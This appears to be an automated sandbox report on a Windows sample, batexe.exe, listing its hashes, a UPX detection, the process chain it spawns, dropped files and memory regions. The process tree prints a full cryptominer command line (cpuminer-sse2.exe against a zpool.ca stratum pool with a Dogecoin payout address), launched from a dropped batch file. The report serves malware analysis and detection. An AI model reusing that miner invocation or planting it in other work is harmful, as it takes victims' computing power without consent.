73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18/02/2024, 14:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4952	b2e.exe
2296	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2296	cpuminer-sse2.exe
2296	cpuminer-sse2.exe
2296	cpuminer-sse2.exe
2296	cpuminer-sse2.exe
2296	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3156-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3156 wrote to memory of 4952	3156	batexe.exe	74
PID 3156 wrote to memory of 4952	3156	batexe.exe	74
PID 3156 wrote to memory of 4952	3156	batexe.exe	74
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4968 wrote to memory of 2296	4968	cmd.exe	78
PID 4968 wrote to memory of 2296	4968	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3156
- C:\Users\Admin\AppData\Local\Temp\21DB.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\21DB.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\21DB.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28C1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\21DB.tmp\b2e.exe

Filesize
704KB

MD5
2bb8bf63c7d7958f71f9307c8635131f

SHA1
2362f18b011bd1e60fa078052821edefa33b8e08

SHA256
85151a35fd2a7ef587918c4702b2adbe0c3e7eed43bc8564a662ed03a6f3ce79

SHA512
59eba9edea2b2af76f261db76b15912b20070d75db7cf498d55a1bc13f11692d016c9a70ed447a784c874f6d11582112312f3d058443606eb4b6de349a4857ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\21DB.tmp\b2e.exe

Filesize
896KB

MD5
1f22d8bf5f6c3dda3e880ea1ba0417d4

SHA1
2a8dbf2319999a894714bdea650eb5be32c64c19

SHA256
afb7da96abe31529f462178372c48627a7e681e3c18cd2196aec8beee07f5b96

SHA512
217b89f6a74039807c135539482b1a769d715190f7756e2b0162a33da3d8ada909b80ca3fc1596e542f163f6a45726282997f4e52a36c352cc89b9e58c1e6e05

Download Submit
C:\Users\Admin\AppData\Local\Temp\28C1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
490KB

MD5
e20c7e6d0b984904bae5fc2914b068d1

SHA1
e1e90b7c02f7c0136ff19e0a0ca9b6f8ac63f89a

SHA256
0061ca78d3ba7f83b6f4f42437ad4aaf99527a07d53bfc2d7d4e60ccc9e1ea9e

SHA512
46b788fdfb266f17442c847af9605a25592094b2e20d411c1630c5c30a3ce7f01b071200805bac92557e876716a3d59d4a648ddba2c101e92e88dfc7205d47b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
576KB

MD5
6e18fc4eda8ed0e6aa6ed56f84803ab3

SHA1
e4a0a4432fcf3184baae1b01a8cb771ed580dbe2

SHA256
f51cf1f35d722b4af4bde30de5008d67d7256d271953eeb2ff63780978f4a53f

SHA512
25f97a3a07fd0aed4a5e6bd58e4cc3ebc2c56c0a314103536e9342ee10aa3c01baa24b459fb58d7154808594203e2b4fddc23f6c424182e2e8bb3a978b4dc256

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
336KB

MD5
54bb21779bcea81b687ea23838f4ec2d

SHA1
bff8efafa023d99e6acac66da320f76a432c7062

SHA256
2e3ea7b8ed5358c6bb30b35c83822012ed052e5b940f6f0e39f00f689f38a7e8

SHA512
52072184319c68297d227dff6e0c2e65529a9a2bb410059e4cc43befc39487a9762d6ca5909bffc33999204cd7338e1ca065a1d4fb86c045acdcb4b66b29a96c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
429KB

MD5
90e592839eeff13f413dae4a4e56ba83

SHA1
fc9d7d84005fa6f0e7fbe6153ea2e8a8bb6e9b3c

SHA256
4d01eb9f2577cc12cb775239f8b61426ae7562b58b678222564e0da5d74570e9

SHA512
5566e03940fdbcc4fa7049f48da619ea77d8d9e2828f2f2216ce374c823435b785d359d824cb48c7fb86a325d5739b15894da6492285e48d82aeb6584737e13c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
240KB

MD5
d229de6402819be48dadcfa294f9c3f0

SHA1
644b03aa07cb03d02ea3de6d05086cec0a92abd5

SHA256
d14650aa0ccd7544b6b8ceda06a1cedcf1d4ce540880372dad269455d9c9fe5d

SHA512
5ba916147cb4626f0db60a3b2c7b20a4c4a8c1a971bc42c927e5c24a03e5cb0980a7636f2c8590e24bf501024d67b9bedb1b7016839096c367304e7790f34e4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
347KB

MD5
89479c85b945a432f13fa8f72db35b7b

SHA1
f1f8118af8a382d378bcac6c1e214d29ae33faf8

SHA256
a5b232d25b2502513754106169a51a63f71f3e9c9f3afb7ea6dff5af4baf5ea2

SHA512
4378a553e2e83f7f55230f2acd9260989894194d5c5a17c7f3617a817185337e2ce39e241a8a9c71824ab205a4c59d8beec745cfacafacfc6bf6a89a6f89e691

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
391KB

MD5
b5c847818701b6774c6cd37e7ef0a49b

SHA1
5255311529d5b7a44aa137932d3035f58edda4bc

SHA256
7642fdebd1414794b67625e55ef12a00941ab3c433a40714a2302573bb1df035

SHA512
d06a8661b570b9c35e97b8585ee33c318f13c050196a865f50728737a5b3949ecfebe4b20f5deebbe814e9ef5e1cec4fb68abc9a532042acc45ebf2230f9db5e

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
212KB

MD5
662891556ff900cc059fb39d3cd3aa71

SHA1
a2e271128aba7aecfcf30a6790958e6eac1bf11b

SHA256
30886d7ffc6bc38ad009dbbf2ae3395a768ee20a8b2cfdc0dcb55f4c38b59c7a

SHA512
6d2ec38a27132ea4e2dad4d11c53f66b127bd8e59c7935c5b63fe3b5125547ea933abadd2c38b28559a7326994fc1d9c6a2a7e8eaa91124003621187f9bbb1e9

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.7MB

MD5
c347b7e5fe19309ec2775903deaf6f82

SHA1
4d5d2d73933ed4964798fc1716c83b25c54d2c4f

SHA256
045921efaffdabba35899d001d8e0560fd7aa078214d37bb92f7cc5091002ed7

SHA512
9755773500407adc739475bc904bdbe158979cc504b7e04d5d615b2dd9bc19e606cb9f4605f0ef82edef7fc9d2469dd3bb8e52da88c0ab5e5d1ff683d858e71a

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.7MB

MD5
b8039a39ca88e0ec0b7b2dddfc05de00

SHA1
3a8d1bd45ea0244a36216e1d2d08f14e8d4b3244

SHA256
0042da00df2f9bad8024a24f60bf5bdcea80e9107b9eef0d3d390606c52aa88b

SHA512
24f27c75a05e9f8eca04f837a7f3943e0a398eff3d91ac95516896769ff85d0dfe49d054b2bb0d1a07e4acfb7ea5704593424bcd1967eff4fe85b5fc6435ce88

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
337KB

MD5
88e26730390acc4c7d3ad329b06a3858

SHA1
33ef7fc2c938795cddd8f4731b791c2d28c1294b

SHA256
52738932fc39718825e1b9ec632a39beacd1df1884d8c97af1099ed706218155

SHA512
302d952243011d4b9c4d431d4064fca24e7951ba6aa9b09195c745a90f9efd997be6b88808921020f3afe715edbfa268ec33ac39732b4781ded9ae8711a100aa

Download Submit
memory/2296-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2296-42-0x0000000050AE0000-0x0000000050B78000-memory.dmp

Filesize
608KB

Download
memory/2296-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2296-44-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/2296-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3156-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4952-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4952-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download